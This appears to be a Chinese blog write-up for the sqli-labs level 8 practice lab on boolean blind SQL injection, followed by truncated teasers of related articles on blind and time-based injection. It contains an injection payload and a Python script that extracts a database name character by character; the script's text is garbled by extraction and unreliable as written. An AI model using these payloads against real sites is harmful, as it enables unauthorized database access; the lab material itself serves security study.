sqli-labs第八關:單引號布林型盲注,手工測出database長度,個人覺得手工比較快
然後使用指令碼測database內容,這個指令碼就比手工快多了,指令碼內容如下:
1測試結果:import
sys2
import
requests
34 url="
"5 payload="
' and ascii(substr(database(),%s,1))>%s --+
"6 database=''
7print("
start to retrive the database")
8for i in range(1,9):
9 max=122 #
z10 min=65 #a11
while abs(max-min)>1:
12 mid=int((max+min)/2)
13 p=payload %(str(i),str(mid))
14 response=requests.get(url %p)
15if response.content.find("
you are in
")!=-1:
16 min=mid
17else
:18 max=mid
19 database=database+chr(max)
20print("
the database is :%s
" % database)
SQL注入之布林盲注指令碼
在做ctf時,我們會碰到很多的sql注入的題目,可能會有各種各樣的過濾,有時候sqlmap會無法滿足我們的需求,無法繞過各種各樣的注入,所以我們需要手寫盲註腳本來對注入點進行注入,自己寫指令碼的好處就是我們可以根據自己的需求對指令碼的功能進行修改,達到繞過注入過濾的目的。import request...
布林型盲注 時間型盲注
布林型盲注核心思想 利用判斷語句杢證明推測是否正確。推測正確時,頁面正常顯示 錯誤時,頁面異常。盲注的一般步驟 1 求閉合字元 2 求當前資料庫名的長度 3 求當前資料庫名對應的ascii值 4 求表的數量 5 求表名的長度 6 求表名對應的ascii值 7 求列的數量 8 求列名的長度 9 求列名...
滲透測試 SQL盲注基於布林的盲注
普通sql注入和sql盲注的區別 sql盲注的思路 基於時間的盲注 通過構造真or假判斷條件的sql語句,且sql語句中根據需要聯合使用sleep 函式一同向伺服器傳送請求,觀察伺服器響應結果是否會執行所設定時間的延遲響應,以此來判斷所構造條件的真or假 若執行sleep延遲,則表示當前設定的判斷條...